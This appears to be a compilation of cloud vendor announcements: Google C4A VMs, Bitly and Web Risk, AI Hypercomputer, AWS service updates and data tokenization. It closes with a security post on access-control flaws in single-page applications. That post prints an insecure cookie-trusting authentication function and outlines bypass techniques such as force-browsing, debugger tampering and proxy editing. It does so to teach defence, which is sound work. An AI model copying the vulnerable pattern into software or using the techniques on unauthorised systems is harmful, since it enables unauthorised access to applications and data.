Today, we are thrilled to announce the general availability of C4A virtual machines with Titanium SSDs custom designed by Google for cloud workloads that require real-time data processing, with low-latency and high-throughput storage performance. Titanium SSDs on C4A VMs deliver storage performance of up to 2.4M random read IOPS, up to 10.4 GiB/s of read throughput, and up to 35% lower access latency compared to previous generation SSDs.1
Titanium SSDs enhance storage security and performance while offloading local storage processing to free up CPU resources. Titanium SSDs are the first generation of Google SSDs integrated with Titanium, a system that boosts application performance by offloading networking, storage and management from the host CPU into a system of custom silicon, hardware and software on-host and throughout our data centers, connected to the host CPU using a Titanium Offload Processor.
C4A is a VM instance family, based on Google Axion Processors, that provides up to 65% better price-performance and up to 60% better energy efficiency than comparable current-generation x86-based instances2. Together, C4A and Titanium SSDs deliver industry-leading price-performance for a broad range of Arm-compatible general-purpose workloads such as high-performance databases, analytics engines, and search, as well as workloads that benefit from caching and local storage capacity.
C4A VMs with Titanium SSDs offer up to 72 vCPUs, 576 GB of memory, and 6 TB of local storage in two shapes — Standard (with 4 GB of memory per vCPU) and High-memory (with 8 GB of memory per vCPU). C4A delivers the connectivity and storage performance that enterprise workloads need, with up to 50 Gbps of standard bandwidth and up to 100 Gbps with Tier_1 networking for high-traffic applications. C4A instances also support Google Cloud’s latest-generation Balanced and Extreme Hyperdisk storage for scalable, high-performance storage with up to 350k IOPS and 5 GB/s throughput per VM.
Google Cloud customers can use C4A with Titanium SSD in Compute Engine, Google Kubernetes Engine (GKE), Batch, Dataproc, and more. C4A VMs are also now available in preview in Dataflow, with support for Cloud SQL, AlloyDB, and other services coming soon.
What our customers and partners are saying
“Couchbase Capella Columnar is purpose-built to accelerate complex analytical queries for real-time insights and empower AI-driven applications. Capella Columnar, running on Google Axion C4A instances with Titanium SSDs, delivers unparalleled price-performance, ultra-low latency and scalable compute power for analytic and operational workloads. We look forward to helping organizations deliver premium customer experiences with Capella Columnar on Google Axion processors.”– Matt McDonough, SVP of Product and Partners, Couchbase
“We are excited to introduce Axion-based C4A VMs with Titanium SSDs to Databricks on Google Cloud in the coming weeks, enabling us to deliver ever stronger price-performance and efficiency gains for our customers. The optimizations offered by Google’s latest Axion compute and Hyperdisk storage options will help customers generate more value from their data warehousing and AI investments on the Databricks Data Intelligence Platform.” – Abhishek Rai, Sr. Director of Engineering, Databricks
“Elastic is committed to enabling customers to drive innovation and cost-efficiency with our Search, AI-powered observability, security, and search solutions on Google Cloud. Google Axion-based C4A VMs with Titanium SSDs provided up to 40% better throughput compared to previous generation VMs in our testing. We look forward to introducing Google Cloud C4A VMs with local Titanium SSD on Elastic Cloud.” – Uri Cohen, VP of Product Management, Elastic
Try C4A now
C4A instances are now generally available via on-demand, Spot VMs, reservations, committed use discounts (CUDs), and FlexCUDs. C4A VMs with Titanium SSDs are available in us-central1 (Iowa), us-east4 (Virginia), us-east1 (South Carolina), europe-west1 (Belgium), europe-west4 (Netherlands), europe-west3 (Frankfurt), europe-west2 (London), and asia-southeast1 (Singapore) today, with availability in additional regions coming soon. Get started on C4A with Titanium SSD today at g.co/cloud/axion.
1. Results are based on Google Cloud’s internal benchmarking.
2. As of September 2024, based on published list prices. Performance based on the estimated SPECrate®2017_int_base performance benchmark scores run in production on comparable latest-generation generally available VMs with general-purpose storage types.
Bitly’s partnership with Google Web Risk helps enhance Bitly’s ability to protect users and build trust as they generate millions of links and QR Codes daily.
Over the last decade, Bitly has solidified its reputation as a multiproduct connections platform, generating millions of links, QR codes, and mobile landing pages every day. Bitly enables users to shorten and customize long URLs for easier sharing, management, and tracking. Its capabilities in link tracking and analytics make Bitly a powerful and essential tool for brands and businesses of all sizes. As the company continues to scale, it’s constantly exploring new ways to enhance its trust and safety program.
Next, Bitly supports its users by fostering innovation, upholding core values, enforcing an Acceptable User Policy (AUP), and developing user-friendly tools including the Bitly Trust Center.
Finally, Bitly forges partnerships with technology experts and NGOs to combat online threats such as terrorism, child sexual abuse materials (CSAM), and phishing campaigns, including its partnership with Google Web Risk.
Google Web Risk and Bitly
To strengthen its already robust trust and safety program, Bitly partnered with Google Web Risk to evaluate linked URLs in real-time against Google’s consistently updated database of unsafe web resources and URLs that violate any of the company’s Safe Browsing policies. Web Risk includes data on more than 1 million unsafe URLs, and continually updates this information by analyzing billions of URLs daily. These unsafe URLs typically include social engineering sites — such as phishing and deceptive sites — and sites that host malware or unwanted software.
“Our goal is to keep users safe and earn their trust by leveraging Google Web Risk’s enterprise security service to validate the safety of millions of generated links and QR Codes in real-time. Given the scale and speed of our users generating millions of links each day, Google Web Risk’s ability to handle this type of volume while delivering real-time verdicts is crucial to ensure seamless and safe online experiences,” said Ben Kleiman, director of Trust and Safety, Bitly.
Some of the key features that Bitly and Google Web Risk bring to customers include:
Checking millions of links and QR codes automatically every day, in real-time, for signals of abusive or malicious content.
Delivering high-fidelity confidence scoring for near real-time automatic, programmatic blocking, or warnings of abusive content.
Providing actionable insights on common types of abusive content such as phishing, malware, spam, and other threats targeting users.
Surfacing patterns of abuse that point to bad actors for strategic response.
Strengthening the competitive advantage around brand trust in the safety of Bitly links.
Web Risk confidence scoring avoids false positives
One key area of content safety that can be the trickiest for companies is the calibration of confidence scoring to avoid false positives in threat detection for URLs.
Google Web Risk’s enterprise-grade features include risk scoring and confidence levels, a unique capability that interested Bitly and added value to the partnership. Web Risk’s confidence scoring helps organizations evaluate the maliciousness level of a URL based on blocklists, machine learning models, and heuristic rules. Web Risk ranks URLs as low, medium, high, very high, and extremely high risk.
“We put a significant focus on confidence scoring within Web Risk to maintain customer trust,” said Kleiman. “Failing to block a malicious URL can undermine that trust, just as false positives can hurt user confidence in our links. We meticulously calibrate confidence scoring with Web Risk and have fine-tuned our threshold where our false positive rate has been remarkably low, particularly given the scale of links and QR codes we generate daily.”
Bitly continues to evolve its security stack to protect its users
Navigating the constantly shifting Internet environment proves to be a challenge for every technology company. Bitly recognizes the importance of adopting cutting-edge technology to safeguard its users effectively.
Bitly has a unique vantage point on the Internet since it captures a lot of signals from many different users in many different industries.
“Our goal is to enhance our security infrastructure to make smarter, faster, and more impactful decisions – not just around websites, but also around our users and their associated accounts. Web Risk is now a core part of this effort, and we are looking forward to leveraging more Google resources, like reCAPTCHA, which will be the next big thing to enhance Bitly’s capabilities,” said Kleiman.
As Bitly’s product offerings grow, so does the complexity of the threat landscape faced by the company’s Trust and Safety team. Kleiman said, “As we continue to evolve, Google’s suite of solutions can provide the necessary tools we need to address our evolving needs so that we can stay ahead of the curve.”
The last few weeks of 2024 were exhilarating as we worked to bring you multiple advancements in AI infrastructure, including the general availability of Trillium, our sixth-generation TPU; A3 Ultra VMs powered by NVIDIA H200 GPUs; support for up to 65,000 nodes in Google Kubernetes Engine (GKE); and Parallelstore, our distributed file system service that offers the low-latency, high-throughput storage that’s essential for HPC and AI workloads. We’re excited to see what you build with these new capabilities.
These innovations come together in AI Hypercomputer, a systems-level approach that draws from our years of experience serving AI experiences for billions of users, and combines performance-optimized hardware, open software and frameworks, and flexible consumption models. This means when you build your AI solution on Google Cloud, you can choose from a set of purpose-built infrastructure components that are designed to work well together. This freedom to choose the appropriate solution for the needs of your specific workload is fundamental to our approach.
Here are some key updates to AI Hypercomputer from the last quarter based on new infrastructure components and how they enable specific AI use cases.
Running distributed (multi-node) workloads
The performance of multi-node (multi-host) applications such as large-scale AI training and HPC workloads can be highly sensitive to network connectivity, requiring precise setup and proactive monitoring. We wanted to make it easier for customers to run large multi-node workloads on GPUs, and launched A3 Ultra VMs and Hypercompute Cluster, our new highly scalable clustering system. Both offerings were made generally available to close out 2024.
A3 Ultra, with NVIDIA H200 GPUs, is a new addition to the A3 family of NVIDIA Hopper GPU-accelerated VMs, with twice the GPU-to-GPU network bandwidth and twice the high bandwidth memory (HBM) compared to A3 Mega with NVIDIA H100 GPUs. A3 Ultra VMs offer the best performance in the A3 family. They are built with our new Titanium ML network adapter and incorporate NVIDIA ConnectX-7 network interface cards (NICs) to deliver a secure, high-performance cloud experience for AI workloads. Combined with our datacenter-wide 4-way rail-aligned network, A3 Ultra VMs deliver up to 3.2 Tbps of non-blocking GPU-to-GPU communication with RDMA over Converged Ethernet (RoCE).
A3 Ultra VMs are also available through GKE, which provides an open, portable, extensible, and highly scalable platform for training and serving AI workloads. To try out A3 Ultra VMs, you can easily create a cluster with GKE or try this pretraining GPU recipe.
Hypercompute Cluster, meanwhile, is a supercomputing services platform built on AI Hypercomputer that lets you deploy and manage a large number of accelerators as a single unit. With features such as dense co-location of resources with ultra-low-latency networking, targeted workload placement, advanced maintenance controls to minimize workload disruption, and topology-aware scheduling integrated into popular schedulers like Slurm and GKE, we built Hypercompute Cluster to help you achieve your throughput and resilience goals. You can use a single API call with pre-configured and validated templates for reliable and repeatable deployments, and with cluster-level observability, health monitoring, and diagnostic tooling, Hypercompute Clusters can run your most demanding workloads easily on Google Cloud. Hypercompute Cluster is now available with A3 Ultra VMs.
LG AI Research is an active user of Google Cloud infrastructure, which it used to train its large language model, Exaone 3.0. It is also an early adopter of A3 Ultra VMs and Hypercompute Cluster, which it is using to power its next set of innovations.
“From the moment we started using Google Cloud’s A3 Ultra with Hypercompute Cluster, powered by NVIDIA H200 GPUs, we were immediately struck by its remarkable performance gains and seamless scalability for our AI workloads. Even more impressive, we had our cluster up and running with our code in under a day — an enormous improvement from the 10 days it used to take us. We look forward to further exploring the potential of this advanced infrastructure for our AI initiatives.” – Jiyeon Jung, AI Infra Sr Engineer, LG AI Research
Making inference on TPUs easier
To enable the next generation of AI agents capable of complex, multi-step reasoning, you need accelerators designed to handle the demanding computational requirements of these advanced models. Trillium TPUs provide significant advancements for inference workloads, delivering up to 3x improvement in inference throughput compared to prior generation TPU v5e.
There are multiple ways to leverage Google Cloud TPUs for AI inference based on your specific needs. You can do this through Vertex AI, our fully managed, unified AI development platform for building and using generative AI, and which is powered by the AI Hypercomputer architecture under the hood. But if you need greater control, we have options lower in the stack that are designed for optimal serving on Cloud TPUs: JetStream is a memory-and-throughput-optimized serving engine for LLMs. MaxDiffusion offers a launching point for diffusion models. And for the Hugging Face community, we worked closely with Hugging Face to launch Optimum TPU and Hugging Face TGI to make serving on Cloud TPUs easier.
Most recently, we announced experimental support for vLLM on TPU with PyTorch/XLA 2.5. Motivated by the strong response to this popular serving option, we’ve been running a preview with a small set of customers to bring the performance (and price-performance) benefits of Cloud TPUs to vLLM.
Our goal is to make it easy for you to try out Cloud TPUs with your existing vLLM setup — just make a few configuration changes to see performance and efficiency benefits in Compute Engine, GKE, Vertex AI, and Dataflow. You can take vLLM for a spin on the Trillium TPUs with this tutorial. All this innovation is happening in the open, and we welcome your contributions.
As we start a new year, we’re excited to continue pushing the boundaries of AI infrastructure with AI Hypercomputer. These updates represent our ongoing commitment to providing you with the performance, efficiency, and ease of use you need to accelerate your AI journey. We look forward to seeing what you achieve with these new capabilities.
Today, AWS Partner Central announces the general availability of Partner Connections, which allows AWS Partners to discover and connect with other Partners for collaboration on shared customer opportunities. With Partner Connections, Partners can co-sell joint solutions, accelerate deal progression, and expand their reach by teaming with other AWS Partners.
At the core of Partner Connections are two key capabilities: connections discovery and multi-partner opportunities. The connections discovery feature uses AI-powered recommendations to streamline Partner matchmaking, making it easier for Partners to find suitable collaborators and add them to their network. With multi-partner opportunities, Partners can work together seamlessly to create and manage joint customer opportunities in APN Customer Engagements (ACE). This integrated approach allows Partners to work seamlessly with AWS and other Partners on shared opportunities, reducing the operational overhead of managing multi-partner opportunities.
Partners can also create, update, and share multi-partner opportunities using the Partner Central API for Selling. Our CRM integration Partners can also enable this capability, allowing their customers to collaborate with other Partners and AWS on joint sales opportunities from their own customer relationship management (CRM) system.
AWS Elastic Beanstalk is expanding its Spot allocation strategy options to include capacity-optimized-prioritized, lowest-price and price-capacity-optimized, in addition to the existing default capacity-optimized strategy.
AWS Elastic Beanstalk is a service that provides the ability to deploy and manage applications in AWS without worrying about the infrastructure that runs those applications. Customers can now enjoy additional allocation strategy options for Spot instances on Elastic Beanstalk such as capacity-optimized-prioritized, lowest-price, and price-capacity-optimized strategies. The capacity-optimized-prioritized strategy allows users to prioritize instance types while still focusing on available capacity, ideal for workloads with specific instance preferences. The lowest-price strategy requests your Spot Instances using the lowest priced pools to maximize cost savings. The price-capacity-optimized strategy balances both price and capacity availability, offering a middle ground for users seeking to optimize costs without compromising too much on the likelihood of interruptions.
These strategies are available in commercial regions where Elastic Beanstalk is available including the AWS GovCloud (US) Regions. For a complete list of regions and service offerings, see AWS Regions.
For more information on Spot allocation strategies and Elastic Beanstalk please see our developer guide. To learn more about Elastic Beanstalk, visit the Elastic Beanstalk product page.
Today, Amazon ElastiCache announces support for Service Quotas. This enhancement provides customers with improved visibility and control over their ElastiCache service quotas, streamlining the quota management process and reducing the need for manual interventions.
With Service Quotas, customers can now view and manage their ElastiCache quota limits directly through the AWS Service Quotas console. This integration enables automated limit increase approvals for eligible requests, improving response times and reducing the number of support tickets. Customers will also benefit from visibility into quota usage for all on-boarded quotas via Amazon CloudWatch usage metrics, allowing for better resource planning and management.
Service Quotas for ElastiCache is available in all commercial regions and the AWS GovCloud (US) Regions.
Today, Amazon MSK announced the availability of four additional instance sizes of Graviton3-based M7g instances for Express Brokers. With this launch, you now have seven different instance sizes to choose from to host Express Brokers in Amazon Managed Streaming for Apache Kafka (Amazon MSK), ranging from large to 16xlarge.
Express brokers are a new broker type for Amazon MSK Provisioned designed to deliver up to 3x more throughput per broker, scale up to 20x faster, and reduce recovery time by 90% as compared to standard Apache Kafka brokers. Express brokers come preconfigured with Kafka best practices by default, support all Kafka APIs, and provide the same low-latency performance that Amazon MSK customers expect, so they can continue using existing client applications without any changes.
Today, Amazon MemoryDB announces support for Service Quotas. This enhancement provides customers with improved visibility and control over their MemoryDB service quotas, streamlining the quota management process and reducing the need for manual interventions.
With Service Quotas, customers can now view and manage their MemoryDB quota limits directly through the AWS Service Quotas console. This integration enables automated limit increase approvals for eligible requests, improving response times and reducing the number of support tickets.
Service Quotas for MemoryDB is available in all commercial regions and the AWS GovCloud (US) Regions where MemoryDB is available.
We are excited to announce that Amazon OpenSearch Serverless is expanding availability to the Asia Pacific (Hong Kong) Region. OpenSearch Serverless is a serverless deployment option for Amazon OpenSearch Service that makes it simple to run search and analytics workloads without the complexities of infrastructure management. OpenSearch Serverless’ compute capacity used for data ingestion, search, and query is measured in OpenSearch Compute Units (OCUs). To control costs, customers can configure the maximum number of OCUs per account.
Today, AWS is announcing the availability of AWS Backup Audit Manager support for cross-account, cross-Region reports in the AWS GovCloud (US) Regions. Now, you can use your AWS Organizations’ management or delegated administrator account to generate aggregated cross-account and cross-Region reports on your data protection policies and retrieve operational data about your backup and recovery activities. AWS Backup enables you to centralize and automate data protection policies across AWS services based on organizational best practices and regulatory standards, and AWS Backup Audit Manager is a feature within the AWS Backup service that allows you to audit and report on the compliance of your data protection policies to help you meet your business and regulatory needs.
AWS Backup Audit Manager is available today in the US East (Ohio, N. Virginia), US West (N. California, Oregon), Canada (Central), Europe (Frankfurt, Ireland, London, Milan, Paris, Stockholm), South America (Sao Paulo), Africa (Cape Town), Asia Pacific (Hong Kong, Mumbai, Osaka, Seoul, Singapore, Sydney, Tokyo), Middle East (Bahrain), and AWS GovCloud (US-East, US-West) Regions. To learn more about AWS Backup Audit Manager, visit the product page and documentation. To get started, visit the AWS Backup console.
AWS Marketplace now supports the collection of Swiss Value Added Tax (VAT) on sales by Independent Software Vendors (ISVs) to customers located in Switzerland. This allows ISVs registered for Swiss VAT to simplify and streamline their tax operations on AWS Marketplace in Switzerland. In addition, AWS Marketplace now supports Multiple Tax Profiles for Switzerland, a new feature that enables ISVs to associate multiple VAT registrations with a single seller account. These features make it easier for global ISVs to do business in Switzerland by simplifying their tax management.
With this launch, ISVs will no longer be required to manually manage the Swiss VAT for their sales in Switzerland. ISVs can now also add a new supplemental Swiss VAT registration number to their seller account which will be taken into account in connection with their sales to customers in Switzerland. AWS Marketplace will calculate, collect and remit the Swiss VAT to the ISVs, and provide a detailed tax report to help ISVs meet their tax obligations.
Tax Collection for Switzerland is available for all ISVs registered with Swiss VAT and when transacting via the AWS Europe, Middle East, and Africa (EMEA) Marketplace Operator. For Multiple Tax Profiles, ISVs can opt-in to add, update, view and manage their supplemental Swiss VAT registration associated with their account using the AWS Marketplace Management portal or the API operations for Tax Settings.
AWS Elemental MediaTailor now lets you filter which logs you want to capture. You can choose specific log types like Ad Server Interactions or individual events like Ad Server Responses, helping reduce costs and complexity by only collecting the data you need. To enable this feature, you add filtering parameters to your session requests to customize logging for each playback session.
Visit the AWS region table for a full list of AWS Regions where AWS Elemental MediaTailor is available. To learn more about MediaTailor, please visit the product page.
The Customer Carbon Footprint Tool is now available on a dedicated page in the AWS Billing console, under Cost and Usage Analysis. It is no longer in the Cost and Usage Reports page, as this page is being deprecated.
The Customer Carbon Footprint Tool supports customers on their sustainability journey. When signed into the AWS Billing console, customers can view their carbon emissions data for the past 36 months by geographical location and by AWS services, including Amazon Elastic Compute Cloud (EC2) and Amazon Simple Storage Service (S3). All other services are reported as Other. They can also measure changes in their carbon footprint over time, as they deploy new resources in the cloud.
To learn more about the Customer Carbon Footprint tool, visit the product page or review the User Guide. Current AWS customers can visit the AWS Billing console to start using this tool as they progress on their sustainability journey.
Starting today, Amazon Elastic Compute Cloud (Amazon EC2) C7i-flex instances, which deliver up to 19% better price performance compared to C6i instances, are available in the AWS GovCloud (US-West) Region. C7i-flex instances expand the EC2 Flex instances portfolio to provide the easiest way for you to get price-performance benefits for a majority of compute-intensive workloads. The new instances are powered by the 4th generation Intel Xeon Scalable custom processors (Sapphire Rapids) that are available only on AWS, and offer 5% lower prices compared to C7i.
C7i-flex instances offer the most common sizes, from large to 8xlarge, and are a great first choice for applications that don’t fully utilize all compute resources. With C7i-flex instances, you can seamlessly run web and application servers, databases, caches, Apache Kafka, Elasticsearch, and more. For compute-intensive workloads that need larger instance sizes (up to 192 vCPUs and 384 GiB memory) or continuous high CPU usage, you can leverage C7i instances.
C7i-flex instances are available in the following AWS Regions: US East (N. Virginia, Ohio), US West (N. California, Oregon), Europe (Frankfurt, Ireland, London, Paris, Spain, Stockholm), Canada (Central), Asia Pacific (Malaysia, Mumbai, Seoul, Singapore, Sydney, Tokyo), South America (São Paulo) and AWS GovCloud (US-West).
AWS announces GeneralPurpose.4xlarge and GeneralPurpose.8xlarge bundles for Amazon WorkSpaces Personal and Amazon WorkSpaces Core, providing customers with powerful cloud desktops for resource-intensive Windows workloads.
GeneralPurpose.4xlarge bundles offer 16 vCPUs and 64 GB RAM, while GeneralPurpose.8xlarge bundles provide 32 vCPUs and 128 GB RAM. Both bundles include a 175 GB root volume and a 100 GB user volume and are available on WorkSpaces Personal and WorkSpaces Core. These new large bundles are designed to allow developers, scientists, financial analysts, and engineers to run demanding applications with ease. Developers can handle large compilation and development tasks with tools like Visual Studio, IntelliJ, and Eclipse, while engineers and scientists can run complex simulations with MATLAB, GNU Octave, R, and Stata. With pay-as-you-go pricing and on-demand scaling, these bundles offer an efficient alternative to costly physical workstations.
The new General Purpose bundles are available today in AWS Regions where WorkSpaces Personal and WorkSpaces Core are offered, except Africa (Cape Town) and Israel (Tel Aviv). They support Windows Server 2022 and Windows 11 through BYOL options. You can launch these bundles through the Amazon WorkSpaces Console, or via APIs. To get started, sign in to the Amazon WorkSpaces Management Console. For pricing details, visit Amazon WorkSpaces Personal pricing or Amazon WorkSpaces Core pricing.
In many industries including finance and healthcare, sensitive data such as payment card numbers and government identification numbers need to be secured before they can be used and shared. A common approach is applying tokenization to enhance security and manage risk.
A token is a substitute value that replaces sensitive data during its use or processing. Instead of directly working with the original, sensitive information (usually referred to as the “raw data”), a token acts as a stand-in. Unlike raw data, the token is a scrambled or encrypted value.
Using tokens reduces the real-world risk posed by using the raw data, while maintaining the ability to join or aggregate values across multiple datasets. This technique is known as preserving referential integrity.
Tokenization engineered into Google Cloud
While tokenization is often seen as a specialized technology that can be challenging and potentially expensive to integrate into existing systems and workflows, Google Cloud offers powerful, scalable tokenization capabilities as part of our Sensitive Data Protection service. With it, you can make calls into serverless API endpoints to tokenize data on the fly in your own applications and data pipelines.
This allows you to enable tokenization without needing to manage any third-party deployments, hardware, or virtual machines. Additionally, the service is fully regionalized, which means tokenization processing happens in the geographical region of your choice, helping you adhere to regulatory or compliance regimes. Pricing is based on data throughput with no upfront costs, so you can scale to as little or as much as your business needs.
Sensitive Data Protection takes things even further by offering in-line tokenization for unstructured, natural-language content. This allows you to tokenize data in the middle of a sentence, and if you pick two-way tokenization (and have the right access permissions), you can detokenize the data when necessary.
This opens up a whole new set of use cases, including runtime tokenization of logs, customer chats, or even content flowing through a generative AI serving framework. We’ve also built this technology directly into Contact Center AI and Dialogflow services so that you can tokenize customer engagement data on the fly.
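As a concrete illustration, here is a minimal sketch of deterministic, two-way tokenization using the Sensitive Data Protection (DLP) client library for Node.js. The project ID, KMS key name, and wrapped key are placeholders you would supply, and the surrogate info type name is an assumption; treat this as a sketch rather than a drop-in implementation.

const {DlpServiceClient} = require('@google-cloud/dlp');
const dlp = new DlpServiceClient();

async function tokenizeEmails(projectId, text) {
  // Deterministically tokenize email addresses found anywhere in free text.
  const [response] = await dlp.deidentifyContent({
    parent: `projects/${projectId}/locations/global`,
    inspectConfig: {infoTypes: [{name: 'EMAIL_ADDRESS'}]},
    deidentifyConfig: {
      infoTypeTransformations: {
        transformations: [{
          infoTypes: [{name: 'EMAIL_ADDRESS'}],
          primitiveTransformation: {
            cryptoDeterministicConfig: {
              // Placeholder key material: a KMS-wrapped key that you manage.
              cryptoKey: {
                kmsWrapped: {
                  wrappedKey: process.env.WRAPPED_KEY,
                  cryptoKeyName: process.env.KMS_KEY_NAME,
                },
              },
              // Controls the token prefix, e.g. "EMAIL(44):...".
              surrogateInfoType: {name: 'EMAIL'},
            },
          },
        }],
      },
    },
    item: {value: text},
  });
  return response.item.value;
}

Because the transformation is keyed and deterministic, the same email always yields the same token, and the companion reidentifyContent method can reverse the token for callers with the appropriate permissions.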
Tokenization with BigQuery
In addition to serverless access through Sensitive Data Protection, we also offer tokenization directly in BigQuery. This gives you tokenization methods at your fingertips in BigQuery SQL queries, User Defined Functions (UDFs), views, and pipelines.
Tokenization technology is built directly into the BigQuery engine to work at high speed and high scale for structured data, such as tokenizing an entire column of values. The resulting tokens are compatible and interoperable with those generated through our Sensitive Data Protection engine. That means you can tokenize or detokenize in either system without incurring unnecessary latency or costs, all while maintaining the same referential integrity.
Using tokens to solve real problems
While the token obscures the underlying sensitive value and the risk it carries, utility is still preserved. Consider the following table, which has four rows and three unique values: value1, value2, value3.

raw value    token
value1       token1
value2       token2
value1       token1
value3       token3

Here you can see that each value is replaced with a token. Notice how "value1" consistently maps to "token1". If you run an aggregation and count unique tokens, you get a count of three, just as on the original values. If you join on the tokenized values, you get the same joins as if you had joined on the original values.
This simple approach unlocks a lot of use cases.
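As a quick illustration of that property, the sketch below uses a stand-in deterministic function (an HMAC via Node's crypto module, not the actual Sensitive Data Protection transformation) to show that distinct-value counts and equality joins behave the same on tokens as on raw values.

const crypto = require('crypto');

// Stand-in deterministic "tokenizer" for illustration only.
const key = crypto.randomBytes(32);
const tokenize = (value) =>
  crypto.createHmac('sha256', key).update(value).digest('base64');

const rawColumn = ['value1', 'value2', 'value1', 'value3'];
const tokenColumn = rawColumn.map(tokenize);

// Distinct counts match: three unique raw values, three unique tokens.
console.log(new Set(rawColumn).size, new Set(tokenColumn).size); // 3 3

// Equal raw values always map to equal tokens, so joins line up the same way.
console.log(tokenColumn[0] === tokenColumn[2]); // true (both were "value1")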
Obfuscating real-world risk
Consider the use case of running fraud analysis across 10 million user accounts. In this case, let’s say that all of your transactions are linked to the end user’s email address. An email address is an identifier that poses several risks:
It can be used to contact the end-user who owns that email address.
It may link to data in other systems that are not supposed to be joined.
It may identify someone’s real-world identity and risk exposing that identity’s connection to internal data.
It may leak other forms of identity, such as the name of the owner of the email account.
Let’s say that the token for that email is "EMAIL(44):AYCLw6BhB0QvauFE5ZPC86Jbn59VogYtTrE7w+rdArLr" and this token has been scoped only to the tables and datasets needed for fraud analysis. That token can now be used in place of the email address: you can tokenize the emails across all the transaction tables and then run fraud analysis.
During this analysis, any users or pipelines exposed to the data would only see the obfuscated emails, protecting your 10 million users while unblocking your business.
Next steps
Tokenization provides a powerful way to protect sensitive information while still allowing for essential data operations. By replacing sensitive data with non-sensitive substitutes, tokens can significantly reduce the risk of data breaches and simplify compliance efforts. Google Cloud simplifies tokenization by offering a readily available, scalable, and region-aware service, allowing you to focus on your core business rather than managing infrastructure.
To get started on using tokenization on Google Cloud, see the following:
Written by: Steven Karschnia, Truman Brown, Jacob Paullus, Daniel McNamara
Executive Summary
Due to their client-side nature, single-page applications (SPAs) will typically have multiple access control vulnerabilities
By implementing a robust access control policy on supporting APIs, the risks associated with client-side rendering can be largely mitigated
Using server-side rendering within the SPA can prevent unauthorized users from modifying or even viewing pages and data that they are not authorized to see
Introduction
Single-page applications (SPAs) are popular due to their dynamic and user-friendly interfaces, but they can also introduce security risks. The client-side rendering frequently implemented in SPAs can make them vulnerable to unauthorized access and data manipulation. This blog post will explore the vulnerabilities inherent in SPAs, including routing manipulation, hidden element exposure, and JavaScript debugging, as well as provide recommendations on how to mitigate these risks.
Single-Page Applications
A SPA is a web application design framework in which the application returns a single document whose content is hidden, displayed, or otherwise modified by JavaScript. This differs from the flat file application framework traditionally implemented in PHP or strictly HTML sites and from the Model-View-Controller (MVC) architecture where data, views, and server controls are handled by different portions of the application. Dynamic data in SPAs is updated through API calls, eliminating the need for page refreshes or navigation to different URLs. This approach makes SPAs feel more like native applications, offering a seamless user experience. JavaScript frameworks that are commonly used to implement SPAs include React, Angular, and Vue.
Client-Side Rendering
In SPAs that use client-side rendering, a server responds to a request with an HTML document that contains only CSS, metadata, and JavaScript. The initially returned HTML document does not contain any content; instead, once the JavaScript files have run in the browser, the application’s frontend user interface (UI) and content are loaded into the HTML document at runtime. If the application is designed to use routing, JavaScript takes the URL and attempts to generate the page that the user requested. While this is happening, the application is making requests to the API endpoint to load data and check whether or not the current user is authorized to access it. If a user is not yet authenticated, the application will render a login page or redirect the user to a separate single sign-on (SSO) application for authentication.
While all of this happens, a user may briefly observe a blank white page before the application dashboard or login page is loaded into their browser. During this pause, the application is potentially loading hundreds of thousands of lines of minified JavaScript that will build the full user experience of the application. SPAs are used in millions of applications across the globe, including Netflix, Hulu, Uber, and DoorDash.
Issues with Client-Side Rendering
Because SPAs rely entirely on the client’s browser to render content (using API data), users have significant control over the application. This enables users to manipulate the application freely, making user or role impersonation easier.
Routing
One fundamental aspect of the JavaScript frameworks that SPAs are implemented in is the idea of routes. These frameworks use routes to indicate different pages in the application. Routes in this case are different views that a user can see, like a dashboard or user profile. Since all of the JavaScript is handled by the client’s browser, the client can view these routes in the JavaScript files that are included in the application source. If a user can identify these routes, they can attempt to access any of them. Depending on how the JavaScript was implemented, there may be checks in place to see if a user has access to the specific route. The following is an example of React routing that includes information on creating the views and, more importantly, the path attributes.
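A minimal sketch of that pattern using React Router appears below; the component names and paths are illustrative assumptions rather than code from any particular application.

// Illustrative React Router routes; every path attribute ships to the
// browser in the JavaScript bundle, so users can discover these routes
// and attempt to browse to them directly.
import { BrowserRouter, Routes, Route } from 'react-router-dom';
import Login from './views/Login';
import Dashboard from './views/Dashboard';
import Profile from './views/Profile';
import AdminPanel from './views/AdminPanel';

export default function App() {
  return (
    <BrowserRouter>
      <Routes>
        <Route path="/login" element={<Login />} />
        <Route path="/dashboard" element={<Dashboard />} />
        <Route path="/profile" element={<Profile />} />
        <Route path="/admin" element={<AdminPanel />} />
      </Routes>
    </BrowserRouter>
  );
}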
Hidden Elements
One way that access control is handled by SPAs is through hidden page elements. This means that when the page loads, the application checks the user’s role through local/session storage, cookie values, or server responses. After the application checks the user’s role, it then displays or hides elements based on that role. In some cases, the application only renders elements that are accessible to the user. In other cases, the application renders every element but "hides" them by controlling the CSS properties of the element. Hidden elements can be exposed through browser Developer Tools, allowing users to force their display. These hidden elements could be form fields or even links to other pages.
JavaScript Debugging
Modern browsers allow users to debug JavaScript in real time by setting breakpoints on JavaScript files, which can be used to modify variables or rewrite functions altogether. Debugging core functions can allow users to bypass access controls and gain unauthorized page access. Consider the following JavaScript:
function isAuth() {
  var user = {};
  // Read the raw cookie string and Base64-decode it.
  var cookies = document.cookie;
  var userData = atob(cookies).split(':');
  if (userData.length == 3) {
    // Expected cookie format after decoding: name:role:isAuthed
    user.name = userData[0];
    user.role = userData[1];
    user.isAuthed = userData[2];
  } else {
    // Malformed cookie: treat the user as unauthenticated.
    user.name = "";
    user.role = "";
    user.isAuthed = false;
  }
  return user;
}
The previously defined function reads the user’s cookie, Base64-decodes the value, splits the text using : as the delimiter, and, if the expected three values are present, treats the user as authenticated based purely on the decoded cookie contents. Identifying these core functions allows an attacker to bypass any authorization and access controls that are being handled by the client-side application.
Exploitation
Manually exploiting JavaScript framework issues takes time and practice, but there are a few techniques that can make it easier. A common technique involves analyzing JavaScript files to identify application routes. Identifying routes allows you to “force-browse” to application pages and access them directly, rather than through the UI. This technique may work on its own, but other times you may need to identify any role checks in the application. These checks can be accessed through the JavaScript debugger to modify variables during execution to bypass authorization or authentication checks. Another useful technique involves capturing server responses to requests for user information in an HTTP proxy, such as Burp Suite Professional, and manually modifying the user object. While these exploitation techniques are effective, they can be mitigated through strong preventative measures, including those detailed in this post.
Recommendations
Access control issues are systemic to client-side-rendered JavaScript frameworks. Once a user has the application loaded into their browser, there are few effective mitigations to prevent the user from interacting with content in unauthorized ways. However, by implementing robust server-side access control checks on APIs, the effect that an attacker could produce is severely reduced. While the attacker might be able to view what a page would look like in the context of an administrator or even view the structure of a privileged request, the attacker would be unable to obtain or modify restricted data.
